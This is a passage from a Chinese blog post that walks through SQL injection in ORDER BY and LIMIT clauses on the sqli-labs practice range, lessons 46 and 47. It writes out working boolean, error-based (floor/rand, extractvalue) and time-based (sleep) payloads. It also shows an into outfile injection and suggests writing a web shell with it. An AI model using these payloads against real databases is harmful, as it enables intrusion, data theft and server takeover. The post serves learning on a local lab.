<p>后来less46测试，不会像floor报错那样10次抽奖6次的那种，这里的rand(x)无论执行多少次都是返回一个结果。貌似因为floor那是因为rand在每次访问时同一个语句rand（x）执行两三次导致的，而这里rand每次访问只执行一次。</p>
<blockquote>
<p>仅限于int型，不然也会出现rand太随机的问题，可以移步后面的“补充-2”</p>
</blockquote>
</blockquote>
</li>
<li>   还有其他方法转换吗？看了上篇那篇文章 <code>order by cast(字段 as char)</code>好像也可以？<blockquote>
<p>不不不，这个cast是强制类型转换的意思，比如你某个字段名就是int类型，比如2，这个时候order by 2就有歧义了，此时就需要这个来转义，使得你以名为2的字段排序，而非第二个字段排序。当然可以as unsigned,as signed都可以。<br>但是这个就是不能达到把最后结果转换为你想要的那个数字的效果，因为你的”2”并非是字段名，他匹配不到，自然无效</p>
<blockquote>
<p>看了下其他的<a target="_blank" rel="noopener" href="https://www.runoob.com/mysql/mysql-functions.html">mysql函数</a>，也试过不少，除了rand，暂时没有合适的</p>
</blockquote>
</blockquote>
<h3 id="注入方法"><a href="#注入方法" class="headerlink" title="注入方法"></a>注入方法</h3></li>
</ul>
<ol>
<li>   如上面所分析的，基于bool的 外面套一层rand即可</li>
<li>   直接报错，因为语句会执行：<code>sort=(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))limit 0,1)</code></li>
<li>   直接延迟，判断延迟时间即可，根本不用care结果那种：<code>sort=If(ascii(substr(database(),1,1))=115,0,sleep (0.1))</code>这个时候if前面的“1 and if（xxx）”可以要，也可以不要，因为核心就是if语句+sleep语句的执行，而即使前面的1 and搭配，这个if sleep语句一样执行<blockquote>
<p>基于less47的再次骄傲自大被打脸，我再次认识到了sql语句，如果传递过来的参数比如 <code>id=&#39;$_GET[ID]&#39;</code>此时参数被’’所包围，此时ID里面的参数不会被解析，这个时候就需要搭配<code>1‘and if(xxx)--+</code>来构造引号闭合，从而使得if sleep语句得以执行</p>
</blockquote>
<h3 id="补充-2"><a href="#补充-2" class="headerlink" title="补充"></a>补充</h3></li>
<li>   报错注入遇到的几率低，毕竟都封堵了报错结果的显示。同时基于延迟报错也要注意控制好时间。因为里面有多少列，sleep就要执行多少次，比如这里14个结果集，就睡14*5=70秒时间太长了，可以适当改为0.3s，这样返回就是5.2s</li>
<li>   rand函数的影响性质再探<img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/data/Peek 2019-06-12 00-22.gif" srcset="/img/loading.gif" lazyload/>
<img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/data/Peek 2019-06-12 00-24.gif" srcset="/img/loading.gif" lazyload/>
>上面那个图是less47的，下面是less46的：
对于less47，反复执行的话，结果就那三样不断地切换（`$sql = "SELECT * FROM users ORDER BY ’$id‘"`）:id外面为一层引号
对于less46，反复执行的话，结果始终唯一且不同`$sql = "SELECT * FROM users ORDER BY $id"`
>就因为47为了闭合引号，从而mysql执行时候多了一个sort='1' and，就导致结果这样反复
>原因暂时不打算深究,目前定结论：int型可以放心rand注入，被单引号包围的string类型不推荐使用。当然string类型也比较少见，比较起不了排序作用，这种代码基本不可能存在
>>无论int还是string,保险起见：使用rand时候，记得多次执行先，判断返回值是否具有随机性！先注入rand进行爆破
## limit之后的注入，order by的延展篇目
还看下select的语法规则
![20190611220719.png](https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/data/20190611220719.png)
order by之后可以跟上limit  
limit后面可以跟上procedure
procedure后面可以跟上into outfile
后面没一个参数都会是一次注入！</li>
</ol>
<p>(2)procedure analyse 参数后注入<br>利用 procedure analyse 参数,我们可以执行报错注入。同时,在 procedure analyse 和 order by 之间可以存在 limit 参数,我们在实际应用中,往往也可能会存在 limit 后的注入,可以利用 procedure analyse 进行注入。<br>以下为示范例<br><a target="_blank" rel="noopener" href="http://127.0.0.1/sqli-labs/Less-46/?sort=1%20%20procedure%20analyse(extractvalue(rand(),concat(0x3a,version())),1">http://127.0.0.1/sqli-labs/Less-46/?sort=1%20%20procedure%20analyse(extractvalue(rand(),concat(0x3a,version())),1</a>)<br>(3)导入导出文件 into outfile 参数<br><a target="_blank" rel="noopener" href="http://127.0.0.1/sqllib/Less-46/?sort=1%20into%20outfile%20%22c:%5C%5Cwamp%5C%5Cwww%5C%5Csqllib%5C%5Ctest1.txt%22">http://127.0.0.1/sqllib/Less-46/?sort=1%20into%20outfile%20%22c:\\wamp\\www\\sqllib\\test1.txt%22</a><br>将查询结果导入到文件当中<br>那这个时候我们可以考虑上传网马,利用 lines terminated by。<br>Into outtfile c:\wamp\www\sqllib\test1.txt lines terminated by 0x(网马进行 16 进制转<br>换)</p>

                            </div>
                            
                                <p class="note note-info">
                                    
                                                    本文最后更新于：
                                                        2022年6月7日 晚上
                                                            
                                </p>
                                
                                    <hr>
                                    <div>
                                        <div class="post-metas mb-3">
                                            
                                                <div class="post-meta mr-3">
                                                    <i class="iconfont icon-category"></i>
                                                    
                                                        <a class="hover-with-bg" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">
                                                            渗透测试
                                                        </a>
                                                        
                                                </div>
                                                
                                                    
                                                        <div class="post-meta">
                                                            <i class="iconfont icon-tags"></i>
                                                            
                                                                <a class="hover-with-bg" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">
                                                                    渗透测试
                                                                </a>
                                                                
                                                                <a class="hover-with-bg" href="/tags/%E9%9D%B6%E5%9C%BA/">
                                                                    靶场
                                                                </a>
                                                                
                                                                <a class="hover-with-bg" href="/tags/sqli/">
                                                                    sqli
                                                                </a>
                                                                
                                                        </div>
                                                        
                                        </div>
                                        
                                            <p class="note note-warning">
                                                
                                                            本博客所有文章欢迎转载 ，但希望转载时能注明出处！ </br>关于文章，如有疑问，欢迎讨论！Email:corp0ra1@qq.com </br>如果图片无法显示:https://corp0ra1.github.io/common/imageLoad.html
                                                                
                                            </p>
                                            
                                                
                                                    <div class="post-prevnext">
                                                        <article class="post-prev col-6">
                                                            
                                                                
                                                                    <a href="/2019/06/29/%5Bold%5D%E7%9F%AD%E6%9A%82%E7%9A%84ubuntu%E4%B9%8B%E6%97%85/">
                                                                        <i class="iconfont icon-arrowleft"></i>
                                                                        <span class="hidden-mobile">一年的ubuntu使用之旅</span>
                                                                        <span class="visible-mobile">上一篇</span>
                                                                    </a>
                                                                    
                                                        </article>
                                                        <article class="post-next col-6">
                                                            
                                                                
                                                                    <a href="/2019/06/12/%5Bold%5Dsqli-labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/">
                                                                        <span class="hidden-mobile">sqli-labs靶场通关记录</span>
                                                                        <span class="visible-mobile">下一篇</span>
                                                                        <i class="iconfont icon-arrowright"></i>
                                                                    </a>
                                                                    
                                                        </article>
                                                    </div>
                                                    
                                    </div>

                                    
                        </article>
                    </div>
                </div>
            </div>
            
                <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
                    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

                </div>
                
        </div>
    </div>

    <!-- Custom -->
    
    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <div> <div class="copyright">©2020 - 2021 By Corp0ra1</div> </div> <div> <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> &nbsp;|&nbsp; <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> &nbsp;|&nbsp; <a href="https://github.com/jsdelivr/jsdelivr" target="_blank" rel="nofollow noopener"><span>jsDelivr</span></a> </div> 
  </div>
  <!--添加运行时间-->
<div id="sitetime"></div>
<script language=javascript>
    function siteTime() {
        window.setTimeout("siteTime()", 1000);
        var seconds = 1000;
        var minutes = seconds * 60;
        var hours = minutes * 60;
        var days = hours * 24;
        var years = days * 365;
        var today = new Date();
        var todayYear = today.getFullYear();
        var todayMonth = today.getMonth() + 1;
        var todayDate = today.getDate();
        var todayHour = today.getHours();
        var todayMinute = today.getMinutes();
        var todaySecond = today.getSeconds();
        /* 
      Date.UTC() -- 返回date对象距世界标准时间(UTC)1970年1月1日午夜之间的毫秒数(时间戳)
      year - 作为date对象的年份，为4位年份值
      month - 0-11之间的整数，做为date对象的月份
      day - 1-31之间的整数，做为date对象的天数
      hours - 0(午夜24点)-23之间的整数，做为date对象的小时数
      minutes - 0-59之间的整数，做为date对象的分钟数
      seconds - 0-59之间的整数，做为date对象的秒数
      microseconds - 0-999之间的整数，做为date对象的毫秒数
     */
        var t1 = Date.UTC(2021, 05, 01, 00, 00, 00); //北京时间2018-2-13 00:00:00
        var t2 = Date.UTC(todayYear, todayMonth, todayDate, todayHour, todayMinute, todaySecond);
        var diff = t2 - t1;
        var diffYears = Math.floor(diff / years);
        var diffDays = Math.floor((diff / days) - diffYears * 365);
        var diffHours = Math.floor((diff - (diffYears * 365 + diffDays) * days) / hours);
        var diffMinutes = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours) / minutes);
        var diffSeconds = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours - diffMinutes * minutes) / seconds);
        document.getElementById("sitetime").innerHTML = "很高兴遇到你，我已经在此等候了你 " + /*diffYears+" 年 "+*/ diffDays + " 天 " + diffHours + " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
    }
    siteTime();
</script>

    <div class="statistics">
        
            

                
                                                
                                                    <!-- 不蒜子统计PV -->
                                                    <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            
            <span id="busuanzi_value_site_pv"></span>
                                                     次
                                                        &nbsp; <span class="iconfont icon-love"></span></span>
                                                        

                                                            

                                                                <!-- 不蒜子统计UV -->
                                                                <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            
            <span id="busuanzi_value_site_uv"></span>
                                                                 人
                                                                    </span>
                                                                    
                                                                        
    </div>
    
  
  <!-- 备案信息 -->
  <div class="beian">
    <span>
      <a href="http://beian.miit.gov.cn/" target="_blank" rel="nofollow noopener">
        鄂ICP备2022018419号-1
      </a>
    </span>
    
      
        <span>
          <a
            href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=46010802001190"
            rel="nofollow noopener"
            class="beian-police"
            target="_blank"
          >
            
              <span style="visibility: hidden; width: 0">|</span>
              <img src="/img/police_beian.png" srcset="/img/loading.gif" lazyload alt="police-icon"/>
            
            <span>琼公网安备 46010802001190号</span>
          </a>
        </span>
      
    
  </div>


  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.2/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      $('#local-search-input').on('click', function() {
        searchFunc(path, 'local-search-input', 'local-search-result');
      });
      $('#modalSearch').on('shown.bs.modal', function() {
        $('#local-search-input').focus();
      });
    })()
  </script>












    
        <!-- Baidu Analytics -->
        <script defer>
            var _hmt = _hmt || [];
            (function() {
                var hm = document.createElement("script");
                hm.src = "https://hm.baidu.com/hm.js?a1a4ccab78dfa522556928ac810fa739";
                var s = document.getElementsByTagName("script")[0];
                s.parentNode.insertBefore(hm, s);
            })();
        </script>
        

            
                <!-- Google Analytics -->
                <!-- <script defer>
      window.ga = window.ga || function () { (ga.q = ga.q || []).push(arguments) };
      ga.l = +new Date;
      ga('create', 'G-4X9XV0H0D5', 'auto');
      ga('send', 'pageview');
    </script>
    <script async src='https://www.google-analytics.com/analytics.js'></script> -->
                <!-- Global site tag (gtag.js) - Google Analytics -->
                <script async src="https://www.googletagmanager.com/gtag/js?G-4X9XV0H0D5"></script>
                <script>
                    window.dataLayer = window.dataLayer || [];

                    function gtag() {
                        dataLayer.push(arguments);
                    }
                    gtag('js', new Date());

                    gtag('config', 'G-4X9XV0H0D5');
                </script>
                

                    

                            

                                    

                                            
                                                    



<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
